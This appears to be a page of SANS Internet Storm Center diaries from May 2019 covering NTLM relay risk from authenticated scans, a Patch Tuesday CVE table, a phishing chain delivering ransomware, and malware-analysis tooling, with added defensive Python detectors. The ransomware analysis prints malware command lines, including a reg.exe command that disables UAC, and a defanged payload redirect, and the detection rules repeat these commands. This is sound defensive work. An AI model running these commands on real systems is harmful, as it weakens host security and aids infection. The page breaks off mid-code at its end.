SANS Internet Storm Center - Cooperative Cyber Security Monitor

Is Metadata Only Approach, Good Enough for Network Traffic Analysis?, (Sun, May 19th)

Five years ago I wrote a diary on how metadata could be used to detect suspicious activity[1]. Obviously, collecting packets allows the analyst to scrutinize the payload, which allows in-depth analysis. However, with more content being encrypted and the cost of storing terabytes of packets, more organizations are now looking at a metadata-only approach as good enough to respond to incidents.

Lately, I had discussions on what might be the "next generation of super tools" to help catch bad actors in a network. If you already have logs from many sources plus metadata, with full packet capture at some key locations, tools like User and Entity Behavior Analytics (UEBA) and Endpoint Detection and Response (EDR) are becoming really effective at catching bad actors in the network and are, in some cases, a replacement for full packet capture.

This appears to be true when combining data from sources such as network device logs with endpoint activity. Not that long ago, network forensic tools (NFTs) stored everything going in and out of a network as raw packets, but today's fast networks make this approach pretty much impractical for nearly everyone. This is where rich host and network metadata can capture most of the information required and provide much better investigative value for the money: it is easier and in most cases faster to find issues lurking in the network, at a much lower computational and storage cost.

There are still some cases where metadata is insufficient and packet capture is required to complement the investigation, but that is becoming rarer.

What do you think currently works best for you in detecting actors inside a network: logs, packets, UEBA, EDR or a combination of some of these tools?

[1] https://isc.sans.edu/forums/diary/Is+Metadata+the+Magic+in+Modern+Network+Security/16114
[2] https://isc.sans.edu/forums/diary/Mapping+Use+Cases+to+Logs+Which+Logs+are+the+Most+Important+to+Collect/22526/
[3] https://isc.sans.edu/diary/Collecting+Logs+from+Security+Devices+at+Home/14614

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
17 May 2019

ISC Stormcast For Friday, May 17th 2019 https://isc.sans.edu/podcastdetail.html?id=6502, (Fri, May 17th)

16 May 2019

The Risk of Authenticated Vulnerability Scans, (Thu, May 16th)

NTLM relay attacks have been a well-known way to attack Microsoft Windows environments for a while, and they usually remain successful. The magic with NTLM relay attacks? You don't need to lose time cracking the hashes, just relay them to the victim machine. To achieve this, we need a "responder" that will capture the authentication session on a system and relay it to the victim. A lab is easy to set up: install the Responder framework[1]. The framework contains a tool called MultiRelay.py which relays the captured NTLM authentication to a specific target and, if the attack is successful, executes some code! (There are plenty of blog posts that explain in detail how to (ab)use this attack scenario.)

Once you have deployed all the tools, you need to wait for an "interesting" user to connect to the infected system. How do you find such juicy user credentials? Most vulnerability scanners offer different scanning modes. The classic one is a non-authenticated scan based on available ports (compare this to a penetration test in "black box" mode). In many organizations, scans are performed in "authenticated mode". This time, the scanner has credentials to connect to targets and is, therefore, able to access more information, like the list of installed applications (compare this to a penetration test in "grey box" mode). See the example below with the free scanner OpenVAS[2]:


You can configure OpenVAS to collect information via SSH, SMB, SNMP or even connect to a VMware hypervisor. To do this, you need to provide valid credentials that have enough access rights to perform basic tasks on the scanned hosts.

I am aware of a case where attackers implemented an NTLM relay on a first victim's host and waited for some SMB authentication. The vulnerability scanner used credentials to perform an authenticated scan, and its connection details were automatically reused to pivot internally and infect more hosts. Given that such users have more rights in order to do their job, they are always an interesting candidate for attackers.

So keep in mind that using security tools can also introduce new risks! By the way, how do you protect yourself against this type of attack? Use SMBv3 and enable SMB signing[3]!
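To check the recommended mitigation from the defender's side, here is an added example (not the diary's own code) that parses the SecurityMode field of an SMB2 NEGOTIATE response, laid out as in MS-SMB2, and reports whether a server merely enables signing or actually requires it; the response bytes are constructed in the block.

```python
"""Parse an SMB2 NEGOTIATE response and report whether the server requires
message signing, the mitigation the diary recommends against NTLM relay.

Layout follows MS-SMB2: a 64-byte SMB2 header followed by the NEGOTIATE
response body whose first three 16-bit fields are StructureSize (65),
SecurityMode and DialectRevision.
"""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001

SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002

DIALECTS = {
    0x0202: "SMB 2.0.2",
    0x0210: "SMB 2.1",
    0x0300: "SMB 3.0",
    0x0302: "SMB 3.0.2",
    0x0311: "SMB 3.1.1",
}


def parse_negotiate_response(data: bytes) -> dict:
    """Return the signing flags and dialect from a raw SMB2 NEGOTIATE response."""
    if len(data) < SMB2_HEADER_LEN + 6:
        raise ValueError("too short for an SMB2 NEGOTIATE response")
    if data[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    # Header fields we need: Command at offset 12, Flags at offset 16.
    command, = struct.unpack_from("<H", data, 12)
    flags, = struct.unpack_from("<I", data, 16)
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response from the server")
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", data, SMB2_HEADER_LEN)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": DIALECTS.get(dialect, "unknown (0x%04x)" % dialect),
        "signing_enabled": bool(security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED),
    }


def assess(info: dict) -> str:
    """Classify the relay exposure implied by the server's security mode.

    In SMB2 signing is only used when one side *requires* it, so a server
    that merely enables it still accepts unsigned (relayed) sessions.
    """
    if info["signing_required"]:
        return "ok: signing required, a relayed session cannot be used"
    if info["signing_enabled"]:
        return "weak: signing only enabled, a relayed client simply does not request it"
    return "exposed: signing disabled, relayed authentication is usable"


def build_sample_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed NEGOTIATE response (header + leading body fields) for testing."""
    header = struct.pack(
        "<4sHHIHHIIQIIQ16s",
        SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1, SMB2_FLAGS_SERVER_TO_REDIR,
        0, 0, 0, 0, 0, b"\x00" * 16,
    )
    body = struct.pack("<HHH", 65, security_mode, dialect)
    return header + body


if __name__ == "__main__":
    for mode in (0x0001, 0x0003):
        info = parse_negotiate_response(build_sample_response(mode))
        print(info["dialect"], "->", assess(info))
```

On a Windows server the "required" flag corresponds to the policy "Microsoft network server: Digitally sign communications (always)"; the default for member servers is "enabled" only. Signing protects the SMB side, so the scanning account itself should also be kept to the minimum rights the scan needs.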

[1] https://github.com/lgandx/Responder
[2] http://www.openvas.org/
[3] https://blogs.msdn.microsoft.com/openspecification/2017/05/26/smb-2-and-smb-3-security-in-windows-10-the-anatomy-of-signing-and-cryptographic-keys/

https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

16 May 2019

ISC Stormcast For Thursday, May 16th 2019 https://isc.sans.edu/podcastdetail.html?id=6500, (Thu, May 16th)

15 May 2019

ISC Stormcast For Wednesday, May 15th 2019 https://isc.sans.edu/podcastdetail.html?id=6498, (Wed, May 15th)

14 May 2019

VMWare just released a security update to address a DLL-hijacking issue affecting VMware Workstation Pro / Player. Details: https://www.vmware.com/security/advisories/VMSA-2019-0007.html, (Tue, May 14th)

14 May 2019

Microsoft May 2019 Patch Tuesday, (Tue, May 14th)

This month we got patches for 79 vulnerabilities from Microsoft and 2 from Adobe. Of those, 23 are critical and 2 were previously known, including one that has been exploited in the wild.

The exploited vulnerability (CVE-2019-0863) affects the way Windows Error Reporting (WER) handles files. It may allow a local attacker to elevate privileges and run arbitrary code in kernel mode. The CVSS v3 score for this vulnerability is 7.8.

The other previously known one (CVE-2019-0932) is an information disclosure vulnerability affecting Skype for Android. By exploiting it, an attacker could listen to the conversation of a Skype for Android user without the user's knowledge.

Among the critical vulnerabilities, it is worth mentioning a remote code execution in Windows Remote Desktop Services (CVE-2019-0708). An unauthenticated attacker may exploit this vulnerability by sending specially crafted packets to the vulnerable service and then execute arbitrary code on the target system. It affects Windows 7 and Windows Server 2008. The CVSS v3 score for this vulnerability is 9.8.

Last but not least, we have a new critical remote code execution vulnerability affecting GDI+ (Windows Graphics Device Interface). An attacker could exploit this vulnerability by convincing the user to open a specially crafted attachment in an e-mail or instant message, for example. The CVSS v3 score for this vulnerability is 8.8.

See Renato's dashboard for a more detailed breakout: https://patchtuesdaydashboard.com

Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
.NET Framework Denial of Service Vulnerability | CVE-2019-0864 | No | No | Less Likely | Less Likely | Important | - | -
.NET Framework and .NET Core Denial of Service Vulnerability | CVE-2019-0820 | No | No | Less Likely | Less Likely | Important | - | -
.Net Framework and .Net Core Denial of Service Vulnerability | CVE-2019-0980 | No | No | Less Likely | Less Likely | Important | - | -
.Net Framework and .Net Core Denial of Service Vulnerability | CVE-2019-0981 | No | No | Less Likely | Less Likely | Important | - | -
ASP.NET Core Denial of Service Vulnerability | CVE-2019-0982 | No | No | Less Likely | Less Likely | Important | - | -
Azure DevOps Server and Team Foundation Server Cross-site Scripting Vulnerability | CVE-2019-0872 | No | No | Less Likely | Less Likely | Important | - | -
Azure DevOps Server and Team Foundation Server Cross-site Scripting Vulnerability | CVE-2019-0979 | No | No | - | - | Important | - | -
Azure DevOps Server and Team Foundation Server Information Disclosure Vulnerability | CVE-2019-0971 | No | No | Less Likely | Less Likely | Important | - | -
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0912 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0913 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0914 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0915 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0916 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0917 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0922 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0923 | No | No | - | - | Important | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0924 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0925 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0927 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0933 | No | No | - | - | Critical | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2019-0937 | No | No | - | - | Critical | 4.2 | 3.8
Diagnostic Hub Standard Collector, Visual Studio Standard Collector Elevation of Privilege Vulnerability | CVE-2019-0727 | No | No | Less Likely | Less Likely | Important | 6.7 | 6.0
GDI+ Remote Code Execution Vulnerability | CVE-2019-0903 | No | No | More Likely | More Likely | Critical | 8.8 | 7.9
Internet Explorer Information Disclosure Vulnerability | CVE-2019-0930 | No | No | More Likely | More Likely | Important | 2.4 | 2.2
Internet Explorer Memory Corruption Vulnerability | CVE-2019-0929 | No | No | - | - | Critical | 7.5 | 6.7
Internet Explorer Security Feature Bypass Vulnerability | CVE-2019-0995 | No | No | - | - | Important | 7.3 | 6.6
Internet Explorer Spoofing Vulnerability | CVE-2019-0921 | No | No | Less Likely | Less Likely | Important | 2.4 | 2.2
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0893 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0894 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0895 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0896 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0897 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0898 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0899 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0900 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0901 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0902 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0889 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0890 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-0891 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Latest Servicing Stack Updates | ADV990001 | No | No | - | - | Critical | - | -
May 2019 Adobe Flash Security Update | ADV190012 | No | No | - | - | Critical | - | -
Microsoft Azure AD Connect Elevation of Privilege Vulnerability | CVE-2019-1000 | No | No | Less Likely | Less Likely | Important | - | -
Microsoft Browser Memory Corruption Vulnerability | CVE-2019-0940 | No | No | More Likely | More Likely | Critical | 7.5 | 6.7
Microsoft Dynamics On-Premise Security Feature Bypass | CVE-2019-1008 | No | No | Less Likely | Less Likely | Important | - | -
Microsoft Edge Elevation of Privilege Vulnerability | CVE-2019-0938 | No | No | - | - | Important | 4.2 | 3.8
Microsoft Edge Memory Corruption Vulnerability | CVE-2019-0926 | No | No | - | - | Critical | 4.2 | 3.8
Microsoft Guidance to mitigate Microarchitectural Data Sampling vulnerabilities | ADV190013 | No | No | More Likely | More Likely | Important | - | -
Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability | CVE-2019-0945 | No | No | Less Likely | Less Likely | Important | - | -
Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability | CVE-2019-0946 | No | No | Less Likely | Less Likely | Important | - | -
Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability | CVE-2019-0947 | No | No | - | - | Important | - | -
Microsoft Office SharePoint XSS Vulnerability | CVE-2019-0963 | No | No | - | - | Important | - | -
Microsoft SQL Server Analysis Services Information Disclosure Vulnerability | CVE-2019-0819 | No | No | Less Likely | Less Likely | Important | - | -
Microsoft SharePoint Elevation of Privilege Vulnerability | CVE-2019-0957 | No | No | Less Likely | Less Likely | Important | - | -
Microsoft SharePoint Elevation of Privilege Vulnerability | CVE-2019-0958 | No | No | Less Likely | Less Likely | Important | - | -
Microsoft SharePoint Server Information Disclosure Vulnerability | CVE-2019-0956 | No | No | - | - | Important | - | -
Microsoft SharePoint Server Remote Code Execution Vulnerability | CVE-2019-0952 | No | No | - | - | Important | - | -
Microsoft SharePoint Spoofing Vulnerability | CVE-2019-0949 | No | No | - | - | Important | - | -
Microsoft SharePoint Spoofing Vulnerability | CVE-2019-0950 | No | No | - | - | Important | - | -
Microsoft SharePoint Spoofing Vulnerability | CVE-2019-0951 | No | No | - | - | Important | - | -
Microsoft Word Remote Code Execution Vulnerability | CVE-2019-0953 | No | No | Less Likely | Less Likely | Critical | - | -
NuGet Package Manager Tampering Vulnerability | CVE-2019-0976 | No | No | Less Likely | Less Likely | Important | - | -
Remote Desktop Services Remote Code Execution Vulnerability | CVE-2019-0708 | No | No | - | - | Critical | 9.8 | 8.8
Scripting Engine Memory Corruption Vulnerability | CVE-2019-0884 | No | No | More Likely | More Likely | Critical | 6.4 | 5.8
Scripting Engine Memory Corruption Vulnerability | CVE-2019-0911 | No | No | More Likely | More Likely | Critical | 7.5 | 6.7
Scripting Engine Memory Corruption Vulnerability | CVE-2019-0918 | No | No | More Likely | More Likely | Critical | 7.5 | 6.7
Skype for Android Information Disclosure Vulnerability | CVE-2019-0932 | Yes | No | Less Likely | Less Likely | Important | - | -
Unified Write Filter Elevation of Privilege Vulnerability | CVE-2019-0942 | No | No | Less Likely | Less Likely | Important | 4.4 | 4.0
Win32k Elevation of Privilege Vulnerability | CVE-2019-0892 | No | No | More Likely | More Likely | Important | 7.8 | 7.0
Windows DHCP Server Remote Code Execution Vulnerability | CVE-2019-0725 | No | No | Less Likely | Less Likely | Critical | 8.1 | 7.3
Windows Defender Application Control Security Feature Bypass Vulnerability | CVE-2019-0733 | No | No | Less Likely | Less Likely | Important | 5.3 | 4.8
Windows Elevation of Privilege Vulnerability | CVE-2019-0734 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0
Windows Elevation of Privilege Vulnerability | CVE-2019-0936 | No | No | More Likely | More Likely | Important | 7.8 | 7.0
Windows Error Reporting Elevation of Privilege Vulnerability | CVE-2019-0863 | Yes | Yes | Detected | Detected | Important | 7.8 | 7.0
Windows GDI Information Disclosure Vulnerability | CVE-2019-0882 | No | No | More Likely | More Likely | Important | 4.7 | 4.2
Windows GDI Information Disclosure Vulnerability | CVE-2019-0961 | No | No | More Likely | More Likely | Important | 4.7 | 4.2
Windows GDI Information Disclosure Vulnerability | CVE-2019-0758 | No | No | More Likely | More Likely | Important | 4.7 | 4.2
Windows Hyper-V Information Disclosure Vulnerability | CVE-2019-0886 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0
Windows Kernel Elevation of Privilege Vulnerability | CVE-2019-0881 | No | No | More Likely | More Likely | Important | 8.8 | 7.9
Windows NDIS Elevation of Privilege Vulnerability | CVE-2019-0707 | No | No | More Likely | More Likely | Important | 7.0 | 6.3
Windows OLE Remote Code Execution Vulnerability | CVE-2019-0885 | No | No | More Likely | More Likely | Important | 7.8 | 7.0
Windows Storage Service Elevation of Privilege Vulnerability | CVE-2019-0931 | No | No | More Likely | More Likely | Important | 7.0 | 6.3

--
Renato Marinho
Morphus Labs | LinkedIn | Twitter

14 May 2019

ISC Stormcast For Tuesday, May 14th 2019 https://isc.sans.edu/podcastdetail.html?id=6496, (Tue, May 14th)

13 May 2019

From Phishing To Ransomware?, (Mon, May 13th)

On Friday, one of our readers reported a phishing attempt to us (thanks to him!). Usually, such emails are simply part of classic phishing waves and try to steal credentials from victims, but this time it was not a simple phishing. Here is a copy of the email, nicely redacted:

When the victim clicks on the "Review and take action" button, (s)he is redirected to a first website:

hxxp://xoxouload[.]ml

This automatically redirects to a second site via an HTTP 301 response:

hxxp://217[.]199[.]187[.]73/verifiedvsa.com/www.office365.com/OneDrive.htm

The following picture is displayed:

Yes, this is just a simple picture; no links are active. So where is the issue? Two seconds after the page has loaded, the browser asks the victim to save a file. The HTML code indeed contains another redirect:

<meta http-equiv="Refresh" content="2;URL=hxxp://bit[.]ly/2WzXy5t">

The shortened URL links to:

hxxp://lichxuanohha[.]com/wp-content/themes/xcx/i47.php
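The delayed meta-refresh above is the whole trick: the visible page is a static picture while the browser is sent elsewhere after two seconds. As an added example (not code from the diary), the parser below pulls every meta refresh out of a landing page, refangs the defanged URL so the host can be compared, and flags a delayed refresh towards a URL shortener; the HTML sample and the short shortener list are constructed here.

```python
"""Extract <meta http-equiv="refresh"> redirects from a landing page and
flag the pattern seen in this phishing chain: a non-zero delay plus a
target on a URL shortener, behind a page that otherwise looks static.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Small illustrative list; extend it from your own blocklist.
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly"}


def parse_refresh_content(content: str):
    """Split 'N;URL=target' (case-insensitive, quotes optional) into (N, target)."""
    parts = content.split(";", 1)
    try:
        delay = float(parts[0].strip())
    except ValueError:
        delay = 0.0
    if len(parts) < 2:
        return delay, None
    target = parts[1].strip()
    if target[:4].lower() == "url=":
        target = target[4:].strip()
    return delay, target.strip("'\"") or None


class MetaRefreshParser(HTMLParser):
    """Collect (delay, url) for each meta refresh tag, wherever it sits in the page."""

    def __init__(self):
        super().__init__()
        self.refreshes = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
        delay, url = parse_refresh_content(a.get("content", ""))
        if url:
            self.refreshes.append((delay, url))


def refang(url: str) -> str:
    """Turn hxxp://bit[.]ly style defanged URLs back into a parseable form."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def analyze_landing_page(html: str) -> list:
    """Return one finding per meta refresh, with a verdict on the redirect."""
    parser = MetaRefreshParser()
    parser.feed(html)
    findings = []
    for delay, url in parser.refreshes:
        host = (urlparse(refang(url)).hostname or "").lower()
        findings.append({
            "delay": delay,
            "url": url,
            "shortener": host in SHORTENER_HOSTS,
            "suspicious": delay > 0 and host in SHORTENER_HOSTS,
        })
    return findings


# Constructed sample mimicking the page described above: a picture plus the
# delayed refresh to the shortened URL quoted in the diary.
SAMPLE_HTML = """<html><head>
<meta http-equiv="Refresh" content="2;URL=hxxp://bit[.]ly/2WzXy5t">
</head><body><img src="office365.png"></body></html>"""

if __name__ == "__main__":
    for finding in analyze_landing_page(SAMPLE_HTML):
        print(finding)
```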

This URL drops a malicious file called "Academics.pdf.exe" (SHA256: ba2598fdd2e5c12e072fbe4c10fcdc6742bace92c0edba42ca4ca7bc195cb813). When I grabbed the file for the first time on Friday, it was unknown on VT. Since then, it has been uploaded by someone else and has a score of 47/71[1]. The file is identified by many AVs as a banking Trojan but, while performing a basic analysis, I found that the malware drops this picture on the target:

I searched for this email address and found a Tweet by @malwarehunterteam from April 25:

Some actions performed by the malware:

C:\Windows\system32\cmd.exe /c wusa C:\Users\admin\AppData\Local\Temp\32.cab /quiet /extract:C:\Windows\system32\migwiz\ & exit
wusa C:\Users\admin\AppData\Local\Temp\32.cab /quiet /extract:C:\Windows\system32\migwiz\

This drops a crypt.dll in C:\Windows\system32\migwiz\ (SHA256: 856623bc2e40d43960e2309f317f7d2c841650d91f2cd847003e0396299c3f98)[2]

"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\888.vbs"
"C:\Windows\System32\migwiz\migwiz.exe"
C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

I saw many files created on the Desktop with filenames "lock_<randomstring>.<extension>", but the honeypot files were not encrypted. I'm still having a look at the sample.
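The three actions listed above are good detection material on their own: a wusa.exe extraction into a System32 subdirectory, a script host launched from a user's Temp folder, and reg.exe switching EnableLUA off. As an added example (not the diary's code), here is a small rule set run over process command lines; the log lines are constructed from the commands quoted above plus one benign wusa.exe run, and the log format is an assumption (one command line per entry, as a Sysmon event 1 or Windows 4688 event would give you).

```python
"""Match process command lines against the behaviours seen in this sample:
wusa /extract into System32 (staging a DLL next to a signed binary),
WScript/CScript run from a user's Temp folder, and UAC disabled via EnableLUA.
"""
import re

RULES = [
    ("wusa_extract_to_system32",
     re.compile(r"\bwusa(\.exe)?\b.*?/extract:\s*\"?[a-z]:\\windows\\system32\\", re.I)),
    ("script_host_from_user_temp",
     re.compile(r"\b[wc]script\.exe\"?\s+\"?[a-z]:\\users\\[^\"\\]+\\appdata\\local\\temp\\", re.I)),
    ("uac_disabled_via_enablelua",
     re.compile(r"\breg(\.exe)?\s+add\b.*?\\policies\\system\b.*?/v\s+enablelua\b.*?/d\s+0\b", re.I)),
]


def scan_command_lines(lines):
    """Return (rule_name, command_line) for every rule that matches a line."""
    hits = []
    for line in lines:
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((name, line))
    return hits


# Constructed log: the diary's command lines plus a legitimate standalone
# update install that must not fire the wusa rule.
SAMPLE_COMMAND_LINES = r"""
C:\Windows\system32\cmd.exe /c wusa C:\Users\admin\AppData\Local\Temp\32.cab /quiet /extract:C:\Windows\system32\migwiz\ & exit
wusa C:\Users\admin\AppData\Local\Temp\32.cab /quiet /extract:C:\Windows\system32\migwiz\
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\888.vbs"
C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\wusa.exe C:\Users\admin\Downloads\update.msu /quiet /norestart
""".strip().splitlines()

if __name__ == "__main__":
    for rule, line in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(f"[{rule}] {line}")
```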

[1] https://www.virustotal.com/gui/file/ba2598fdd2e5c12e072fbe4c10fcdc6742bace92c0edba42ca4ca7bc195cb813/detection
[2] https://www.virustotal.com/gui/file/856623bc2e40d43960e2309f317f7d2c841650d91f2cd847003e0396299c3f98/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

13 May 2019

ISC Stormcast For Monday, May 13th 2019 https://isc.sans.edu/podcastdetail.html?id=6494, (Mon, May 13th)

10 May 2019

DSSuite - A Docker Container with Didier's Tools, (Fri, May 10th)

If you follow us and read our daily diaries, you probably already know some of the famous tools developed by Didier (like oledump.py, translate.py and many more). Didier uses them all the time to analyze malicious documents. His tools are also used by many security analysts and researchers. The complete toolbox is available on his github.com page[1]. You can clone the repository or download the complete package as a zip archive[2]. However, it's not convenient to reinstall them every time you switch computers if, like me, you're always on the road between different customers.

Being a fan of Docker containers, I built a Docker image called "DSSuite" (not a very original name :-) that contains all of Didier's tools preinstalled and ready to use from any system that has Docker available. The image is available on hub.docker.com[3].

To use it, just pull the image:

$ docker pull rootshell/dssuite

Once done, you can use tools directly from Docker or start an interactive shell. First, let’s try a simple oledump against a sample OLE file:

$ file malicious_ole.vir
malicious_ole.vir: Composite Document File V2 Document, Cannot read section info
$ docker run -it --rm -v $(pwd):/malware rootshell/dssuite oledump.py malicious_ole.vir
  1:       O   49737 '\x01Ole10Native'
  2:               6 '\x03ObjInfo'

If you don’t pass arguments to the container, an interactive shell will be started:

$ docker run -it -v $(pwd):/malware rootshell/dssuite
 ____  ____  ____        _ _
|  _ \/ ___|/ ___| _   _(_) |_ ___
| | | \___ \\___ \| | | | | __/ _ \
| |_| |___) |__) | |_| | | ||  __/
|____/|____/____/ \__,_|_|\__\___|
Version 1.0 - Help: https://blog.didierstevens.com/my-software/
root@a43d72df1d9b:/malware#

Note that you need to map a /malware volume to access the malicious files to analyze.

For more convenience, create an alias like this in your shell to call the commands directly (arguments typed after the alias are appended to the docker command line, so no "$@" is needed inside the alias):

$ alias dssuite='docker run -it --rm -v "$(pwd)":/malware rootshell/dssuite'
$ dssuite oledump.py sample.doc

Most of the tools run out of the box, but let me know if you detect some issues and I'll keep the Docker image updated.

[1] https://github.com/DidierStevens/DidierStevensSuite
[2] https://didierstevens.com/files/software/DidierStevensSuite.zip
[3] https://hub.docker.com/r/rootshell/dssuite

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

10 May 2019

ISC Stormcast For Friday, May 10th 2019 https://isc.sans.edu/podcastdetail.html?id=6492, (Fri, May 10th)

9 May 2019

ISC Stormcast For Thursday, May 9th 2019 https://isc.sans.edu/podcastdetail.html?id=6490, (Thu, May 9th)

8 May 2019

ISC Stormcast For Wednesday, May 8th 2019 https://isc.sans.edu/podcastdetail.html?id=6488, (Wed, May 8th)

8 May 2019

Email roulette, May 2019, (Wed, May 8th)

Introduction

For today's diary I play a game of email roulette. My version of email roulette is picking a recent item of malicious spam (malspam), running the associated email attachment in a live sandbox, and identifying the malware. I acquired a recent malspam example through VirusTotal (VT) Intelligence. Let's see what the roulette wheel gives us today!

Searching for malspam attachments in VT Intelligence

VT Intelligence is a subscription service and, from what I understand, fairly expensive. Fortunately I have access through my employer. In the VT Intelligence search window, I used the following parameters:

tag:attachment fs:2019-05-07+ p:3+

This returned anything tagged as an email attachment, first seen on or after 2019-05-07, with at least 3 vendors identifying an item as malicious.  After the results appeared, I sorted by the most recent submissions.


Shown above:  Searching and sorting in the VT Intelligence portal.


Shown above:  Results sorted by most recent at the time of my search.

The three most recent results I saw were 7-zip archives (.7z files). The file names did not use plain ASCII characters but were base64 encoded. The base64 string represents UTF-8 characters, in the format name:"=?utf-8?B?[base64 string]?=".

I picked the most recent result and selected the relations tab, which revealed the associated malspam.  Then I retrieved that email from VT Intelligence.


Shown above:  Pivoting on the attachment to find its parent email.


Shown above:  The email opened in Thunderbird on a Windows 7 host.

The attached 7-zip archive contained 3 files with different names, but they were all the same file hash, so they were the same malware.  I extracted them and ran one on a vulnerable Windows host.  The result was a Gandcrab ransomware infection.


Shown above:  Encrypted files and the ransom note on my infected Windows host.
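The attachment names in the VT results, and the pivot from attachment hash to parent email, can be reproduced offline on the .eml itself. As an added example (not the diary's own tooling), the script below walks an email's MIME parts, decodes the =?utf-8?B?...?= encoded-word filenames described above, hashes each attachment and labels it by magic bytes; the .eml and its "archive" (just the 7-zip signature plus filler, not a real archive) are constructed in the block.

```python
"""Triage attachments in an .eml: decode RFC 2047 encoded-word filenames
(the name:"=?utf-8?B?...?=" form seen in the VT Intelligence results),
hash each payload and identify archives/executables by their magic bytes.
"""
import base64
import email
import hashlib
from email.header import decode_header, make_header

MAGICS = {
    b"7z\xbc\xaf\x27\x1c": "7-zip archive",
    b"PK\x03\x04": "zip archive",
    b"MZ": "PE executable",
}


def decode_filename(raw: str) -> str:
    """Decode '=?utf-8?B?...?=' encoded words; plain names pass through unchanged."""
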